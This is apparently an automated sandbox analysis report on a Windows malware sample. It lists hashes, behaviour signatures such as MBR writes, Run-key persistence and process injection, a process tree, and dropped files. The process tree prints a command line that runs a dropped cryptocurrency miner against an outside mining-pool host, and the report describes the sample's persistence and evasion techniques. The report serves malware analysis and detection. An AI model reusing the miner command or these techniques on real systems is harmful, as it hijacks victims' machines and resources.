Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-08-2024 16:48

General

  • Target

    a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe

  • Size

    1.0MB

  • MD5

    a3573c69097a3cb16aeef32f471d3e59

  • SHA1

    b49b36f4f6e7aedf926467c13e6474b227092ed9

  • SHA256

    c73e340bbe794dbf37662394aebde7de77649f6b5e422c443b86f5a1f1f7ab4e

  • SHA512

    31ca953e701a457154bde59020ddeceee3adc0f2eacd73e2e9454e186b95a6bffbdd45d99e9b4bd8164950b0c96613939d245ee33ae0bdec02574b1d4109ef6f

  • SSDEEP

    24576:0VMM5Si97gDwpG9LmctpwL7K1f7eADraRhcpl1i8hUfTt:MMniNEwpG9LDZx7eAD2zSji8hUfTt

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe"
      2⤵
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4164
      • C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\a3573c69097a3cb16aeef32f471d3e59_JaffaCakes118.exe"
        3⤵
        • Checks computer location settings
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
          "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3324
          • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
            "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
            5⤵
            • Executes dropped EXE
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe
              "C:\Users\Admin\AppData\Local\Temp\udpconmain.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4124
              • C:\Users\Admin\AppData\Local\Temp\miner.exe
                "C:\Users\Admin\AppData\Local\Temp\miner.exe" -a 5 -o http://eu.triplemining.com:8344 -u udri_yocaniseeyourboobs -p lolbitches -t 1
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1596
              • C:\Users\Admin\AppData\Local\Temp\unzip.exe
                "C:\Users\Admin\AppData\Local\Temp\unzip.exe" payload.zip
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\help.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3764

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\help.bat

    Filesize

    142B

    MD5

    9b57ba33ffe6db4ed453ecbcc59d4b2a

    SHA1

    c74009ed71bd696aacb7b5d3cbf2473e80431262

    SHA256

    e70f18a2c9165485e8be78f3806c55f3a761b5253709c40e3136d24bd10b63f2

    SHA512

    d2e41712e81e46dca0ee79d07b21c666b26e1a47186d377aa84cea5fdbbd9fe0d15c08e5eb8b0ca15eec189b2e9c458652d6f3b99b48606241d7ac2799c851c9

  • C:\Users\Admin\AppData\Local\Temp\miner.exe

    Filesize

    726KB

    MD5

    3b4986e5d94d0e5723eea640a6735769

    SHA1

    eab3272d5ef1038bf3d336d2b033b813403a9ff2

    SHA256

    8b2b026f8d00b02ff75f05cbf322e4f4b85fb609cddd93bebf17014914b90df9

    SHA512

    efff68d4e82bf61cf7430e0673fe92f5f379ac5e52b084516d6d624097e3f767f7696f48d576dce02b03fe5976db862271db5a7b01298211913b5fa901ddb965

  • C:\Users\Admin\AppData\Local\Temp\udpconmain.exe

    Filesize

    1.0MB

    MD5

    a3573c69097a3cb16aeef32f471d3e59

    SHA1

    b49b36f4f6e7aedf926467c13e6474b227092ed9

    SHA256

    c73e340bbe794dbf37662394aebde7de77649f6b5e422c443b86f5a1f1f7ab4e

    SHA512

    31ca953e701a457154bde59020ddeceee3adc0f2eacd73e2e9454e186b95a6bffbdd45d99e9b4bd8164950b0c96613939d245ee33ae0bdec02574b1d4109ef6f

  • C:\Users\Admin\AppData\Local\Temp\unzip.exe

    Filesize

    164KB

    MD5

    75375c22c72f1beb76bea39c22a1ed68

    SHA1

    e1652b058195db3f5f754b7ab430652ae04a50b8

    SHA256

    8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

    SHA512

    1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

  • memory/2336-27-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/2336-12-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/2336-11-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/2336-9-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/3996-49-0x0000000000400000-0x00000000004FE000-memory.dmp

    Filesize

    1016KB

  • memory/4124-46-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/4124-79-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/4124-82-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

  • memory/4164-3-0x0000000000400000-0x00000000004FE000-memory.dmp

    Filesize

    1016KB

  • memory/4164-32-0x0000000000400000-0x00000000004FE000-memory.dmp

    Filesize

    1016KB

  • memory/4164-6-0x0000000000400000-0x00000000004FE000-memory.dmp

    Filesize

    1016KB